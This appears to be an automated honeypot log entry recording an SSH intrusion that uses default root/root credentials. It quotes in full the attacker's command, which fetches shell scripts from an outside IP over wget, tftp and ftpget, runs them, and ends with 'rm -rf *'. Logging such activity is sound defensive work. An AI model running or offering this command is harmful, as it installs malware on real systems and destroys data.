honeypots.tk

Record Observations : 198.98.60.66 ssh Web script execution 198.98.60.66 SJN3TB0D4JWKPNLU

<< Back

198.98.60.66 client username 'root' and password 'root' entered
198.98.60.66 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.50.55/it.sh; chmod 777 it.sh; sh it.sh; tftp 209.141.50.55 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 209.141.50.55; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.50.55 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf it.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
Author: Honeypots.tk Robot